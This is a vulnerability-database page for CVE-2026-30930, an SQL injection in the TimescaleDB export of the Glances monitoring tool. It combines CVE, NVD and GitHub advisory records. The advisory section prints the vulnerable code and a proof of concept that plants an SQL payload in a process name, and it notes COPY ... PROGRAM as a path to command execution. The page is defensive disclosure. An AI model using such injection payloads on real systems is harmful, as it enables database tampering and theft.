Vulnerability-Lookup

CVE-2026-30930 (GCVE-0-2026-30930)

Vulnerability from cvelistv5 – Published: 2026-03-10 16:16 – Updated: 2026-03-11 03:57

Title

Glances has SQL Injection via Process Names in TimescaleDB Export

Summary

Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.1, The TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names. This vulnerability is fixed in 4.5.1.

Severity ?

7.3 (High)


                        
                          CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/nicolargo/glances/security/adv…	x_refsource_CONFIRM
	https://github.com/nicolargo/glances/commit/39161…	x_refsource_MISC
	https://github.com/nicolargo/glances/releases/tag…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	nicolargo	glances	Affected: < 4.5.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-30930",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-10T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-11T03:57:17.097Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "glances",
          "vendor": "nicolargo",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 4.5.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.1, The TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names. This vulnerability is fixed in 4.5.1."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-10T16:16:59.991Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/nicolargo/glances/security/advisories/GHSA-x46r-mf5g-xpr6",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-x46r-mf5g-xpr6"
        },
        {
          "name": "https://github.com/nicolargo/glances/commit/39161f0d6fd723d83f534b48f24cdca722573336",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nicolargo/glances/commit/39161f0d6fd723d83f534b48f24cdca722573336"
        },
        {
          "name": "https://github.com/nicolargo/glances/releases/tag/v4.5.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nicolargo/glances/releases/tag/v4.5.1"
        }
      ],
      "source": {
        "advisory": "GHSA-x46r-mf5g-xpr6",
        "discovery": "UNKNOWN"
      },
      "title": "Glances has SQL Injection via Process Names in TimescaleDB Export"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-30930",
    "datePublished": "2026-03-10T16:16:59.991Z",
    "dateReserved": "2026-03-07T16:40:05.885Z",
    "dateUpdated": "2026-03-11T03:57:17.097Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-30930\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-10T18:18:52.837\",\"lastModified\":\"2026-03-17T16:20:46.670\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.1, The TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names. This vulnerability is fixed in 4.5.1.\"},{\"lang\":\"es\",\"value\":\"Glances es una herramienta de monitoreo de sistema de c\u00f3digo abierto multiplataforma. Antes de la versi\u00f3n 4.5.1, el m\u00f3dulo de exportaci\u00f3n de TimescaleDB construye consultas SQL utilizando concatenaci\u00f3n de cadenas con datos de monitoreo del sistema no saneados. El m\u00e9todo normalize() envuelve los valores de cadena entre comillas simples pero no escapa las comillas simples incrustadas, lo que hace que la inyecci\u00f3n SQL sea trivial a trav\u00e9s de datos controlados por el atacante, como nombres de procesos, puntos de montaje del sistema de archivos, nombres de interfaces de red o nombres de contenedores. Esta vulnerabilidad se corrige en la versi\u00f3n 4.5.1.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.5.1\",\"matchCriteriaId\":\"5B30F860-5F24-4658-B6CD-B1507A8A3747\"}]}]}],\"references\":[{\"url\":\"https://github.com/nicolargo/glances/commit/39161f0d6fd723d83f534b48f24cdca722573336\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/nicolargo/glances/releases/tag/v4.5.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/nicolargo/glances/security/advisories/GHSA-x46r-mf5g-xpr6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-30930\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-10T16:40:20.789428Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-10T16:40:49.503Z\"}}], \"cna\": {\"title\": \"Glances has SQL Injection via Process Names in TimescaleDB Export\", \"source\": {\"advisory\": \"GHSA-x46r-mf5g-xpr6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.3, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.1\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-x46r-mf5g-xpr6\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-x46r-mf5g-xpr6\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/commit/39161f0d6fd723d83f534b48f24cdca722573336\", \"name\": \"https://github.com/nicolargo/glances/commit/39161f0d6fd723d83f534b48f24cdca722573336\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.1\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.1, The TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names. This vulnerability is fixed in 4.5.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-10T16:16:59.991Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-30930\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-11T03:57:17.097Z\", \"dateReserved\": \"2026-03-07T16:40:05.885Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-10T16:16:59.991Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-30930

Vulnerability from fkie_nvd - Published: 2026-03-10 18:18 - Updated: 2026-03-17 16:20

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/nicolargo/glances/commit/39161f0d6fd723d83f534b48f24cdca722573336	Patch
security-advisories@github.com	https://github.com/nicolargo/glances/releases/tag/v4.5.1	Product
security-advisories@github.com	https://github.com/nicolargo/glances/security/advisories/GHSA-x46r-mf5g-xpr6	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	nicolargo	glances	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B30F860-5F24-4658-B6CD-B1507A8A3747",
              "versionEndExcluding": "4.5.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.1, The TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names. This vulnerability is fixed in 4.5.1."
    },
    {
      "lang": "es",
      "value": "Glances es una herramienta de monitoreo de sistema de c\u00f3digo abierto multiplataforma. Antes de la versi\u00f3n 4.5.1, el m\u00f3dulo de exportaci\u00f3n de TimescaleDB construye consultas SQL utilizando concatenaci\u00f3n de cadenas con datos de monitoreo del sistema no saneados. El m\u00e9todo normalize() envuelve los valores de cadena entre comillas simples pero no escapa las comillas simples incrustadas, lo que hace que la inyecci\u00f3n SQL sea trivial a trav\u00e9s de datos controlados por el atacante, como nombres de procesos, puntos de montaje del sistema de archivos, nombres de interfaces de red o nombres de contenedores. Esta vulnerabilidad se corrige en la versi\u00f3n 4.5.1."
    }
  ],
  "id": "CVE-2026-30930",
  "lastModified": "2026-03-17T16:20:46.670",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "LOCAL",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.6,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "PROOF_OF_CONCEPT",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-10T18:18:52.837",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/nicolargo/glances/commit/39161f0d6fd723d83f534b48f24cdca722573336"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/nicolargo/glances/releases/tag/v4.5.1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-x46r-mf5g-xpr6"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-X46R-MF5G-XPR6

Vulnerability from github – Published: 2026-03-09 19:51 – Updated: 2026-03-10 18:44

Summary

Glances has SQL Injection via Process Names in TimescaleDB Export

Details

Summary

The TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names.

Root Cause: The normalize() function uses f"'{value}'" for string values without escaping single quotes within the value. The resulting strings are concatenated into INSERT queries via string formatting and executed directly with cur.execute() — no parameterized queries are used.

Affected Code

File: glances/exports/glances_timescaledb/__init__.py, lines 79-93 (normalize function)

def normalize(self, value):
    """Normalize the value to be exportable to TimescaleDB."""
    if value is None:
        return 'NULL'
    if isinstance(value, bool):
        return str(value).upper()
    if isinstance(value, (list, tuple)):
        # Special case for list of one boolean
        if len(value) == 1 and isinstance(value[0], bool):
            return str(value[0]).upper()
        return ', '.join([f"'{v}'" for v in value])
    if isinstance(value, str):
        return f"'{value}'"  # <-- NO ESCAPING of single quotes within value

    return f"{value}"

File: glances/exports/glances_timescaledb/__init__.py, lines 201-205 (query construction)

# Insert the data
insert_list = [f"({','.join(i)})" for i in values_list]
insert_query = f"INSERT INTO {plugin} VALUES {','.join(insert_list)};"
logger.debug(f"Insert data into table: {insert_query}")
try:
    cur.execute(insert_query)  # <-- Direct execution of concatenated SQL

PoC

As a normal user, create a process with the name containing the SQL Injection payload:

exec -a "x'); COPY (SELECT version()) TO '/tmp/sqli_proof.txt' --"   python3 -c 'import time; [sum(range(500000)) or time.sleep(0.01) for _ in iter(int, 1)]'

Start Glances with TimescaleDB export as root user:

glances --export timescaledb --export-process-filter ".*" --time 5 --stdout cpu

Observe that sqli_proof.txt is created in /tmp directory.

Impact

Data Destruction: DROP TABLE, DELETE, TRUNCATE operations against the TimescaleDB database.
Data Exfiltration: Using COPY ... TO or subqueries to extract data from other tables.
Potential RCE: Via PostgreSQL extensions like COPY ... PROGRAM which executes OS commands.
Privilege Escalation: Any local user who can create a process with a crafted name can inject SQL into the database, potentially compromising the entire PostgreSQL instance.

Severity ?

7.3 (High)


                  
                    CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "Glances"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30930"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-09T19:51:35Z",
    "nvd_published_at": "2026-03-10T18:18:52Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names.\n\nRoot Cause: The normalize() function uses f\"\u0027{value}\u0027\" for string values without escaping single quotes within the value. The resulting strings are concatenated into INSERT queries via string formatting and executed directly with cur.execute() \u2014 no parameterized queries are used.\n\n#### Affected Code\n- _File: glances/exports/glances_timescaledb/__init__.py, lines 79-93 (normalize function)_\n```\ndef normalize(self, value):\n    \"\"\"Normalize the value to be exportable to TimescaleDB.\"\"\"\n    if value is None:\n        return \u0027NULL\u0027\n    if isinstance(value, bool):\n        return str(value).upper()\n    if isinstance(value, (list, tuple)):\n        # Special case for list of one boolean\n        if len(value) == 1 and isinstance(value[0], bool):\n            return str(value[0]).upper()\n        return \u0027, \u0027.join([f\"\u0027{v}\u0027\" for v in value])\n    if isinstance(value, str):\n        return f\"\u0027{value}\u0027\"  # \u003c-- NO ESCAPING of single quotes within value\n\n    return f\"{value}\"\n```\n\n- _File: glances/exports/glances_timescaledb/__init__.py, lines 201-205 (query construction)_\n```\n# Insert the data\ninsert_list = [f\"({\u0027,\u0027.join(i)})\" for i in values_list]\ninsert_query = f\"INSERT INTO {plugin} VALUES {\u0027,\u0027.join(insert_list)};\"\nlogger.debug(f\"Insert data into table: {insert_query}\")\ntry:\n    cur.execute(insert_query)  # \u003c-- Direct execution of concatenated SQL\n```\n\n### PoC\n- As a normal user, create a process with the name containing the SQL Injection payload:\n```\nexec -a \"x\u0027); COPY (SELECT version()) TO \u0027/tmp/sqli_proof.txt\u0027 --\"   python3 -c \u0027import time; [sum(range(500000)) or time.sleep(0.01) for _ in iter(int, 1)]\u0027\n```\n- Start Glances with TimescaleDB export as root user:\n```\nglances --export timescaledb --export-process-filter \".*\" --time 5 --stdout cpu\n```\n- Observe that sqli_proof.txt is created in /tmp directory.\n\n### Impact\n\n- Data Destruction: DROP TABLE, DELETE, TRUNCATE operations against the TimescaleDB database.\n- Data Exfiltration: Using COPY ... TO or subqueries to extract data from other tables.\n- Potential RCE: Via PostgreSQL extensions like COPY ... PROGRAM which executes OS commands.\n- Privilege Escalation: Any local user who can create a process with a crafted name can inject SQL into the database, potentially compromising the entire PostgreSQL instance.",
  "id": "GHSA-x46r-mf5g-xpr6",
  "modified": "2026-03-10T18:44:40Z",
  "published": "2026-03-09T19:51:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-x46r-mf5g-xpr6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30930"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/commit/39161f0d6fd723d83f534b48f24cdca722573336"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nicolargo/glances"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/releases/tag/v4.5.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Glances has SQL Injection via Process Names in TimescaleDB Export"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-30930 (GCVE-0-2026-30930)

FKIE_CVE-2026-30930

GHSA-X46R-MF5G-XPR6

Summary

Affected Code

PoC

Impact

Tags

Sightings

Nomenclature